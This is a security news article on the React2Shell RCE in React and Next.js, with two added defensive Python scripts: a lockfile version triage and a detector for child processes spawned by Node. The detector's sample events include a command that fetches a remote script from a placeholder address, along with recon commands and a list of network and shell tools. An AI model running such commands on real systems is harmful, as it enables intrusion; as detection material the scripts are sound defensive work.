Exploitation of CVE-2025-55182, dubbed React2Shell, is escalating in the wild, security researchers say. Amazon said it had seen a trio of China-linked threat groups exploiting the pre-auth RCE bug, and Cloudflare inadvertently took down its own services in its scramble to deploy an Internet-scale fix.

The CVSS 10 vulnerability affects React and Next.js. Public disclosure came on December 3. Exploitation of the React bug followed within 30 hours. 

Threat actors have replicated a variant of the elegantly simple proof-of-concept code published by New Zealand-based researcher Lachlan Davidson, who disclosed the bug, and attacks are now happening at some scale. The caveat is that exploitability is limited to newer stacks: CVE-2025-55182 affects React 19+ and Next.js 15.x and 16.x when the App Router is in use.

(There’s even a publicly available Chrome extension on GitHub that automatically scans for and exploits vulnerable sites as attackers browse.)

Vercel CEO Guillermo Rauch has published a useful walkthrough of the “doozy” of a bug, describing it as “A juxtaposition of a glaring omission of a safety check, combined with a stunningly brilliant mechanism to exploit it.”

Overreaction to a “celebrity vulnerability”?

To security researcher Kevin Beaumont, the furore around the bug is an “overreaction”: React 19 was only released in December 2024, and exploitability relies on React Server Components, which are also new.

“This is a niche setup,” he wrote this weekend.

Beaumont added: “A vast majority of organisations won’t have this setup yet, let alone internet facing. The vulnerability was caught quickly after it was first introduced in the new feature by the maintainers…”

Nextron Systems’ Florian Roth notes that, despite this and some other configuration caveats, the attack surface is not insignificant: “In Next.js with the App Router, Server Components are the default. Pages and layouts are server components unless you explicitly mark them with ‘use client’. 

“React 19 alone doesn’t enable this by itself, but once a framework like Next.js implements RSC, you are effectively in that model by default…”

Sysdig notes that the issue is not confined to Next.js; affected frameworks and versions include:

  • Next.js (15.0.4 through 16.0.6, plus canaries from 14.3.0-canary.77)
  • React Router (RSC mode)
  • Waku
  • Parcel RSC (@parcel/rsc)
  • Vite RSC (@vitejs/plugin-rsc)
  • RedwoodSDK (rwsdk)
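Turning the version list above into a triage check is the first thing most teams will want to do. The script below is an added example, not Assetnote's scanner, Vercel's tooling or Sysdig's analysis: it reads an npm lockfile (v2/v3 layout, where installed packages sit under the `packages` key) and flags a Next.js version that falls inside the range the page quotes (15.0.4 through 16.0.6, canaries from 14.3.0-canary.77) together with a React major of 19 or higher. The lockfile content is constructed. Treat the result as a triage signal only: the page gives no upper bound for affected canary builds, and backported patch releases may fall inside the quoted stable range, so confirm against the vendor advisory; and whether the App Router is actually in use has to be checked in the project itself.

```python
"""Added triage example for CVE-2025-55182 (React2Shell).

Flags Next.js / React versions inside the ranges quoted on the page.
Not the scanner or tooling of any vendor named in the article; the
lockfile below is constructed sample input.
"""
import json
import re
from typing import Optional, Tuple

# Ranges as quoted on the page (Sysdig list): Next.js 15.0.4 through 16.0.6
# stable, canaries from 14.3.0-canary.77; React 19+ with Server Components.
NEXT_STABLE_LOW = (15, 0, 4)
NEXT_STABLE_HIGH = (16, 0, 6)
NEXT_CANARY_LINE = (14, 3, 0)
NEXT_CANARY_FIRST = 77
REACT_AFFECTED_MAJOR = 19

_SEMVER = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?")


def parse_version(v: str) -> Tuple[Tuple[int, int, int], Optional[str]]:
    """Split '15.1.0' or '14.3.0-canary.77' into ((major, minor, patch), prerelease)."""
    m = _SEMVER.match(v.strip().lstrip("v^~"))
    if not m:
        raise ValueError(f"unparseable version: {v!r}")
    core = (int(m.group(1)), int(m.group(2)), int(m.group(3)))
    return core, m.group(4)


def next_status(version: str) -> str:
    """Classify a Next.js version against the quoted affected ranges."""
    core, pre = parse_version(version)
    if pre is not None:
        canary = re.match(r"canary\.(\d+)$", pre)
        if canary and (core > NEXT_CANARY_LINE or
                       (core == NEXT_CANARY_LINE and int(canary.group(1)) >= NEXT_CANARY_FIRST)):
            # The page quotes no upper bound for canaries: flag and check the advisory.
            return "affected-canary"
        return "unknown-prerelease"
    if NEXT_STABLE_LOW <= core <= NEXT_STABLE_HIGH:
        # Patch releases inside this range exist; confirm against the advisory.
        return "in-affected-range"
    return "outside-range"


def react_status(version: str) -> str:
    core, _ = parse_version(version)
    return "react-19-plus" if core[0] >= REACT_AFFECTED_MAJOR else "pre-19"


def triage_lockfile(lock_json: str) -> dict:
    """Look up the installed next/react versions in an npm v2/v3 lockfile."""
    packages = json.loads(lock_json).get("packages", {})
    result = {}
    for name in ("next", "react"):
        entry = packages.get(f"node_modules/{name}")
        if not entry:
            result[name] = {"version": None, "status": "not-installed"}
            continue
        version = entry["version"]
        status = next_status(version) if name == "next" else react_status(version)
        result[name] = {"version": version, "status": status}
    result["needs-attention"] = (
        result["next"]["status"] in ("in-affected-range", "affected-canary")
        and result["react"]["status"] == "react-19-plus"
    )
    return result


# Constructed sample lockfile (not taken from any real project).
SAMPLE_LOCK = json.dumps({
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"dependencies": {"next": "15.1.0", "react": "19.0.0"}},
        "node_modules/next": {"version": "15.1.0"},
        "node_modules/react": {"version": "19.0.0"},
    },
})

if __name__ == "__main__":
    print(json.dumps(triage_lockfile(SAMPLE_LOCK), indent=2))
```

Run it against a real `package-lock.json` by replacing `SAMPLE_LOCK` with the file's contents; `needs-attention` is true for the constructed sample because Next.js 15.1.0 sits inside the quoted range and React is 19.0.0.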

Cyberspace search engine ZoomEye suggests that more than 672,000 Internet-exposed assets are potentially affected, and React2Shell is progressively being added to Mirai and other botnet exploitation kits.

(On the server, Next.js uses React's APIs to orchestrate rendering. The rendering work is split into chunks… Server Components are rendered into a data format called the React Server Component Payload, or RSC Payload, and Client Components and the RSC Payload are used to pre-render HTML.)

React2Shell: Leave no trace

A key challenge for defenders, as ever, is identifying their attack surface. Assetnote has released a free scanner that the vulnerability's original finder, Lachlan Davidson, himself describes as “very effective at detecting unpatched Next.js instances that use Server Components”.

Identifying exploitation is notably challenging too. As Roth noted on X: “It’s wild how little sticks around when someone hits a server with the React RCE payload. All the interesting parts of the POST request live for a moment in memory, get decoded, executed (or rejected), and vanish. Nothing hits a log, nothing lands on disk. You can scan process memory for patterns, sure, but you’ll mostly catch scanners, broken requests, bots, random noise.”

He added: “A clean ‘this was a successful exploit’ signal isn’t really possible here. The only reliable detection is post-exploitation activity on the box.”

His colleague Swachchhanda Poudel over the weekend developed some Sigma rules “that cover the one thing that reliably shows up when someone actually executes code on a Node.js server -> child processes. One rule for Linux, one for Windows. It’s not a silver bullet,” wrote Roth, “just one of the few angles that makes sense right now. We pushed all our YARA and Sigma signatures for the React RCE cases as well, and contributed the Sigma rules upstream: https://github.com/SigmaHQ/sigma/pull/5795

"This whole situation shows how much attack surface lives in places many of us didn’t think about before. I expect we’ll see more of this class of issues now that people realize what’s possible."
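The detection angle Roth describes, a Node.js server process spawning child processes, can be expressed without Sigma tooling. The script below is an added example and an independent, simplified implementation of that idea; it is not Nextron's Sigma rules from the pull request above. It reads process-creation events as JSON lines (one record per process start, with `parent_image`, `image`, `cmdline`, `pid`, `ppid` and `host` fields, a field layout assumed here rather than taken from any particular telemetry product), covers both Linux and Windows image paths, and rates a shell, interpreter or downloader spawned by `node` as high severity and any other non-node child as medium. The event lines are constructed, not real telemetry, and the address in them is a documentation-reserved one.

```python
"""Added detection example: child processes spawned by a Node.js server.

Independent, simplified logic; not Nextron's Sigma rules. The event
records below are constructed sample input in an assumed JSON-lines
layout, not output of any real EDR or audit pipeline.
"""
import json
from typing import List, Optional

# Children that almost never belong under a production Node.js server.
HIGH_RISK_CHILDREN = {
    "sh", "bash", "dash", "zsh", "cmd", "powershell", "pwsh",
    "curl", "wget", "nc", "ncat", "python", "python3", "perl", "base64",
}


def basename(path: str) -> str:
    """Last path component, lower-cased, '.exe' stripped; handles / and \\."""
    name = path.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def is_node(path: str) -> bool:
    return basename(path) in {"node", "nodejs"}


def classify(event: dict) -> Optional[dict]:
    """Return a finding when a node process spawns a non-node child, else None."""
    parent = event.get("parent_image", "")
    child = event.get("image", "")
    if not is_node(parent) or is_node(child):
        return None  # not a node parent, or a node worker/cluster child
    severity = "high" if basename(child) in HIGH_RISK_CHILDREN else "medium"
    return {
        "severity": severity,
        "host": event.get("host"),
        "ppid": event.get("ppid"),
        "pid": event.get("pid"),
        "parent": parent,
        "child": child,
        "cmdline": event.get("cmdline", ""),
    }


def scan(lines: List[str]) -> List[dict]:
    """Run classify() over JSON-lines process events, skipping malformed lines."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # do not let one bad record stop the scan
        finding = classify(event)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample events (raw string so the Windows backslashes reach JSON as \\).
SAMPLE_EVENTS = r"""
{"host":"web-01","ppid":1201,"pid":4410,"parent_image":"/usr/bin/node","image":"/bin/sh","cmdline":"sh -c id;uname -a"}
{"host":"web-01","ppid":1201,"pid":4412,"parent_image":"/usr/bin/node","image":"/usr/bin/curl","cmdline":"curl http://203.0.113.7/x.sh"}
{"host":"web-01","ppid":1201,"pid":1202,"parent_image":"/usr/bin/node","image":"/usr/bin/node","cmdline":"node worker.js"}
{"host":"web-01","ppid":900,"pid":1201,"parent_image":"/bin/bash","image":"/usr/bin/node","cmdline":"node server.js"}
{"host":"web-02","ppid":2200,"pid":2310,"parent_image":"/usr/bin/node","image":"/usr/bin/git","cmdline":"git rev-parse HEAD"}
{"host":"win-01","ppid":5120,"pid":5188,"parent_image":"C:\\Program Files\\nodejs\\node.exe","image":"C:\\Windows\\System32\\cmd.exe","cmdline":"cmd.exe /c whoami"}
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS.splitlines()):
        print(f"[{f['severity']}] {f['host']} {f['parent']} -> {f['child']} :: {f['cmdline']}")
```

On the constructed input this yields four findings: the `sh`, `curl` and `cmd.exe` children are high, `git` is medium, and the node worker and the normal `bash -> node` start are ignored. Expect the medium tier to need tuning per application (build steps, `git` calls and similar legitimate spawns), which is the same caveat Roth attaches to the Sigma rules.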

